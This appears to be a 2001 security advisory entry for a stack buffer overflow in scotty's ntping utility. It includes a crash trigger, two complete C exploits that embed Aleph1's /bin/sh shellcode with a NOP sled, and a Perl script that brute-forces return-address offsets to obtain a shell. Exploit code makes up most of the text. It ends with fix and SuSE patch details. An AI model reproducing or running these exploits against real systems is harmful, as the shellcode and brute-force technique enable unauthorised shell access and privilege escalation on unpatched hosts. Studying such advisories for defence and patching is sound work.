|
Vulnerability scotty (ntping) Affected scotty (ntping) Description 'KF' found following: [root@linux d0tslash]# /usr/bin/ntping `perl -e 'print "A" x 9000'` Segmentation fault (core dumped) Here is an exploit ppl were toying with. Perhaps someone with better overflow skills can tweak it a bit. Larry W. Cashdollar got it to spit out a shell at various offsets, you can use the brute.pl script to automate the process (tested Mandrake 8.0). Code: /*Larry W. Cashdollar 6/13/2001 http://vapid.dhs.org Vapid Labs Overflows ntping for scotty-2.1.9 based on post by dotslash@snosoft.com*/ #include <stdio.h> #include <stdlib.h> #define NOP 0x90 /*no operation skip to next instruction. */ #define LEN 798 /*our buffersize. */ /*lacks a call to setuid(0)*/ char shellcode[]= /*Aleph1's shell code. */ "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; /*Nab the stack pointer to use as an index into our nop's*/ long get_sp () { __asm__ ("mov %esp, %eax"); } int main (int argc, char *argv[]) { char buffer[LEN]; int i; long retaddr = get_sp (); /*Fill the buffer with our new address to jump to esp + offset */ for (i = 0; i < LEN; i += 4) *(long *) &buffer[i] = retaddr + atoi (argv[1]); /*copy the NOPs in to the buffer leaving space for shellcode and pointers*/ printf ("Jumping to address %x BufSize %d\n", retaddr + atoi (argv[1]),LEN); for (i = 550; i < (LEN - strlen (shellcode) - 50); i++) *(buffer + i) = NOP; /*copy the shell code into the buffer*/ memcpy (buffer + i, shellcode, strlen (shellcode)); execl ("/usr/sbin/ntping", "ntping", buffer,0, 0); } brute.pl: #!/usr/bin/perl $X=50; while ($X<= 1000) { system("./wp $X"); print "$X\n"; $X= $X+1; } Larry W. Cashdollar did his version of exploit available at: http://vapid.dhs.org/ntping_exp.c Here it is: /*Larry W. Cashdollar 6/13/2001 http://vapid.dhs.org Vapid Labs Overflows ntping for scotty-2.1.9 based on post by dotslash@snosoft.com doesnt give root, prives are dropped. Unless ntping has setgid bit set.*/ #include <stdio.h> #include <stdlib.h> #define NOP 0x90 /*no operation skip to next instruction. */ #define LEN 590 /*our buffersize. */ /*lacks a call to setuid(0)*/ char shellcode[]= /*Aleph1's shell code. */ "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; /*Nab the stack pointer to use as an index into our nop's*/ long get_sp () { __asm__ ("mov %esp, %eax"); } int main (int argc, char *argv[]) { char buffer[LEN]; int i; long retaddr = get_sp (); /*Fill the buffer with our new address to jump to esp + offset */ for (i = 0; i < LEN; i += 4) *(long *) &buffer[i] = retaddr + atoi (argv[1]); /*copy the NOPs in to the buffer leaving space for shellcode and pointers*/ printf ("Jumping to address %x BufSize %d\n", retaddr + atoi (argv[1]),LEN); /* for (i = 0; i < (LEN - strlen (shellcode) - 100); i++) *(buffer + i) = NOP;*/ /*copy the shell code into the buffer*/ memcpy (buffer + i, shellcode, strlen (shellcode)); execl ("/usr/sbin/ntping", "ntping", buffer,0, 0); } Solution Fixed in scotty 2.1.11. For SuSE: ftp://ftp.suse.com/pub/suse/i386/update/7.0/tcl2/scotty-2.1.10-315.i386.rpm ftp://ftp.suse.com/pub/suse/i386/update/7.0/zq1/scotty-2.1.10-315.src.rpm ftp://ftp.suse.com/pub/suse/i386/update/6.4/tcl2/scotty-2.1.10-314.i386.rpm ftp://ftp.suse.com/pub/suse/i386/update/6.4/zq1/scotty-2.1.10-314.src.rpm ftp://ftp.suse.com/pub/suse/i386/update/6.3/tcl2/scotty-2.1.10-314.i386.rpm ftp://ftp.suse.com/pub/suse/i386/update/6.3/zq1/scotty-2.1.10-314.src.rpm ftp://ftp.suse.com/pub/suse/sparc/update/7.0/tcl2/scotty-2.1.10-268.sparc.rpm ftp://ftp.suse.com/pub/suse/sparc/update/7.0/zq1/scotty-2.1.10-268.src.rpm ftp://ftp.suse.com/pub/suse/axp/update/7.0/tcl2/scotty-2.1.10-273.alpha.rpm ftp://ftp.suse.com/pub/suse/axp/update/7.0/zq1/scotty-2.1.10-273.src.rpm ftp://ftp.suse.com/pub/suse/axp/update/6.4/tcl2/scotty-2.1.10-272.alpha.rpm ftp://ftp.suse.com/pub/suse/axp/update/6.4/zq1/scotty-2.1.10-272.src.rpm ftp://ftp.suse.com/pub/suse/axp/update/6.3/tcl2/scotty-2.1.10-274.alpha.rpm ftp://ftp.suse.com/pub/suse/axp/update/6.3/zq1/scotty-2.1.10-274.src.rpm ftp://ftp.suse.com/pub/suse/ppc/update/7.0/tcl2/scotty-2.1.10-274.ppc.rpm ftp://ftp.suse.com/pub/suse/ppc/update/7.0/zq1/scotty-2.1.10-274.src.rpm ftp://ftp.suse.com/pub/suse/ppc/update/6.4/zq1/scotty-2.1.10-274.src.rpm